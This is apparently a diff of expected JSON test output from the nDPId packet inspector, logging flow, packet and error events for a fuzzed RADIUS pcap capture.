00598{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":43,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996521324,"flow_last_seen":1528996521324,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528996740339,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1796,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00598{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":43,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996521324,"flow_last_seen":1528996521324,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528996740339,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1796,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00701{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":43,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1528996068129,"flow_last_seen":1528996740339,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":9322,"flow_avg_l4_payload_len":423,"midstream":0,"thread_ts_msec":1528996740339,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00701{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":43,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1528996068129,"flow_last_seen":1528996740339,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":9322,"flow_avg_l4_payload_len":423,"midstream":0,"thread_ts_msec":1528996740339,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
@@ -63,8 +63,8 @@
00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996990648,"flow_last_seen":1528996990648,"flow_idle_time":180000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1528996990648,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":29264,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996990648,"flow_last_seen":1528996990648,"flow_idle_time":180000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1528996990648,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":29264,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00590{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1528996990648,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":147,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":147,"pkt_l4_len":113,"thread_ts_msec":1528996990648,"pkt":"ABRP+4rqcNuYVcUnCABFAACFzqFAAPwRhYTG4hk1CgxAHgcVclAAcSboBSEAaT3FxpV5xYvpMtB7xhdyjsUBNTAzMTE0ODAwNzM2MzgwNzJAd2xhOS5tbmNwODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgJWIyMmEzMWMvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjEx"} 00590{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1528996990648,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":147,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":147,"pkt_l4_len":113,"thread_ts_msec":1528996990648,"pkt":"ABRP+4rqcNuYVcUnCABFAACFzqFAAPwRhYTG4hk1CgxAHgcVclAAcSboBSEAaT3FxpV5xYvpMtB7xhdyjsUBNTAzMTE0ODAwNzM2MzgwNzJAd2xhOS5tbmNwODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgJWIyMmEzMWMvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjEx"}
00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996990648,"flow_last_seen":1528996990648,"flow_idle_time":180000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1528996990648,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":29264,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996990648,"flow_last_seen":1528996990648,"flow_idle_time":180000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1528996990648,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1813,"dst_port":29264,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
00723{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":50,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":9472,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"thread_ts_msec":1528996996859,"pkt":"ABRP+4rqcNuYVcUnJQBFAAE4+6JAAPwRV9jG4hk1Cgyqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} 00709{"packet_event_id":1,"packet_event_name":"packet","packet_id":50,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":9472,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"thread_ts_msec":1528996996859,"pkt":"ABRP+4rqcNuYVcUnJQBFAAE4+6JAAPwRV9jG4hk1Cgyqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"}
00212{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":50,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":9472,"global_ts_msec":1528996997052} 00198{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":50,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":9472,"global_ts_msec":1528996997052}
00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":51,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528996684582,"flow_last_seen":1528996684582,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528996996859,"l3_proto":"ip4","src_ip":"10.4.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":51,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528996684582,"flow_last_seen":1528996684582,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528996996859,"l3_proto":"ip4","src_ip":"10.4.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":51,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996733156,"flow_last_seen":1528996733156,"flow_idle_time":180000,"flow_min_l4_payload_len":109,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1528996996859,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":309,"dst_port":12339,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":51,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996733156,"flow_last_seen":1528996733156,"flow_idle_time":180000,"flow_min_l4_payload_len":109,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1528996996859,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":309,"dst_port":12339,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00598{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":51,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996733156,"flow_last_seen":1528996733156,"flow_idle_time":180000,"flow_min_l4_payload_len":109,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1528996996859,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":309,"dst_port":12339,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00598{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":51,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996733156,"flow_last_seen":1528996733156,"flow_idle_time":180000,"flow_min_l4_payload_len":109,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1528996996859,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":309,"dst_port":12339,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -72,17 +72,17 @@
00620{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":51,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996680808,"flow_last_seen":1528996680808,"flow_idle_time":180000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1528996996859,"l3_proto":"ip4","src_ip":"198.226.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00620{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":51,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996680808,"flow_last_seen":1528996680808,"flow_idle_time":180000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1528996996859,"l3_proto":"ip4","src_ip":"198.226.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00605{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":51,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996680808,"flow_last_seen":1528996680808,"flow_idle_time":180000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1528996996859,"l3_proto":"ip4","src_ip":"198.226.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00605{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":51,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996680808,"flow_last_seen":1528996680808,"flow_idle_time":180000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1528996996859,"l3_proto":"ip4","src_ip":"198.226.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00702{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":51,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1528996068129,"flow_last_seen":1528996996859,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":10905,"flow_avg_l4_payload_len":436,"midstream":0,"thread_ts_msec":1528996996859,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00702{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":51,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1528996068129,"flow_last_seen":1528996996859,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":10905,"flow_avg_l4_payload_len":436,"midstream":0,"thread_ts_msec":1528996996859,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
00622{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":52,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":239,"pkt_type":2050,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":239,"pkt_l4_len":0,"thread_ts_msec":1528997003122,"pkt":"ABRP+4rqcNuYVcUnCAJFAADh+7RAAPwRWBXG4hk1CgxAHgcUchAAzbxOCyQAxZ9vEHep5UhYAk0ZSBfGW2ABNTAzMTE0ODAwcjM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE0ODQvZjA6Nzk6NjA6ZDE6N2Q6MjcvMjE1WEoBAgBIFwEAAAEFAAD\/dHhHt8FXBaLd\/Dz8eGsAAgUAALtgmvoL3QAA9ON0yrW1Z\/uLAQACCwUAACkdfnJp8UtH8QraekvpDSFQErTrf98odpcx7aFbGWQ5MZk="} 00608{"packet_event_id":1,"packet_event_name":"packet","packet_id":52,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":239,"pkt_type":2050,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":239,"pkt_l4_len":0,"thread_ts_msec":1528997003122,"pkt":"ABRP+4rqcNuYVcUnCAJFAADh+7RAAPwRWBXG4hk1CgxAHgcUchAAzbxOCyQAxZ9vEHep5UhYAk0ZSBfGW2ABNTAzMTE0ODAwcjM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE0ODQvZjA6Nzk6NjA6ZDE6N2Q6MjcvMjE1WEoBAgBIFwEAAAEFAAD\/dHhHt8FXBaLd\/Dz8eGsAAgUAALtgmvoL3QAA9ON0yrW1Z\/uLAQACCwUAACkdfnJp8UtH8QraekvpDSFQErTrf98odpcx7aFbGWQ5MZk="}
00212{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":52,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":2050,"global_ts_msec":1528997003303} 00198{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":52,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":2050,"global_ts_msec":1528997003303}
00725{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":58,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"thread_ts_msec":1528997012137,"pkt":"ABRP+4rqcNuYVcUnCABFAIEw++ZAAPwRV5TG4hk1CgxAHgcUchABHA0JAicBFBsdKAWbpXDSR2MuOEvDRI4aCwAAV8gbBVNQQxpuAAABNxA0owm4HCG6PU2XNAkv\/vzDOB0KCSSyhii6vunR59O76CIKGOYjAfl7PUhdXq\/+IyUA1AERNOgzhBq9cBFTORk8iq5zOGawlRK5SmrzC9CE14BmLSTx9+rzUr5gcK7nljeTYDH3Q7JtAU4wMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNCUALm12YzMxMS4zZ3BwbmV0d29yay5vcmcsIDViMjJhNDg0L2YwOjc5OjYwOmQxOjdkOjM3LzIxNVkMOTA4NDIxMzI5MhIJU3VjY2VzcxkFU1BDTwYDAgAEUBJln13lrCrLxGDT3fIxBMmg"} 00711{"packet_event_id":1,"packet_event_name":"packet","packet_id":58,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"thread_ts_msec":1528997012137,"pkt":"ABRP+4rqcNuYVcUnCABFAIEw++ZAAPwRV5TG4hk1CgxAHgcUchABHA0JAicBFBsdKAWbpXDSR2MuOEvDRI4aCwAAV8gbBVNQQxpuAAABNxA0owm4HCG6PU2XNAkv\/vzDOB0KCSSyhii6vunR59O76CIKGOYjAfl7PUhdXq\/+IyUA1AERNOgzhBq9cBFTORk8iq5zOGawlRK5SmrzC9CE14BmLSTx9+rzUr5gcK7nljeTYDH3Q7JtAU4wMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNCUALm12YzMxMS4zZ3BwbmV0d29yay5vcmcsIDViMjJhNDg0L2YwOjc5OjYwOmQxOjdkOjM3LzIxNVkMOTA4NDIxMzI5MhIJU3VjY2VzcxkFU1BDTwYDAgAEUBJln13lrCrLxGDT3fIxBMmg"}
00231{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":58,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":284,"global_ts_msec":1528997012338} 00217{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":58,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":284,"global_ts_msec":1528997012338}
00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":59,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1528996603395,"flow_last_seen":1528996832079,"flow_idle_time":180000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":834,"flow_tot_l4_payload_len":2114,"flow_avg_l4_payload_len":422,"midstream":0,"thread_ts_msec":1528997012137,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":59,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1528996603395,"flow_last_seen":1528996832079,"flow_idle_time":180000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":834,"flow_tot_l4_payload_len":2114,"flow_avg_l4_payload_len":422,"midstream":0,"thread_ts_msec":1528997012137,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1813,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
01295{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":63,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"thread_ts_msec":1528997020091,"pkt":"AAAMB6xAABRP+4rqCAAHAALbIOZAAP8RAAAKDEAexuIZNXIQBxQC1gAAASoCn1lLG5tNeGgoWBAiZw18BtkaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICVZXSVNQUjEwGgkAADghDQMyNwZbIqSfATUwMzExNDgwMjgxNTAxNTg5QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR+qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 01281{"packet_event_id":1,"packet_event_name":"packet","packet_id":63,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"thread_ts_msec":1528997020091,"pkt":"AAAMB6xAABRP+4rqCAAHAALbIOZAAP8RAAAKDEAexuIZNXIQBxQC1gAAASoCn1lLG5tNeGgoWBAiZw18BtkaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICVZXSVNQUjEwGgkAADghDQMyNwZbIqSfATUwMzExNDgwMjgxNTAxNTg5QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR+qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
00210{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":1,"thread_id":0,"packet_id":63,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1528997023243} 00196{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":1,"packet_id":63,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1528997023243}
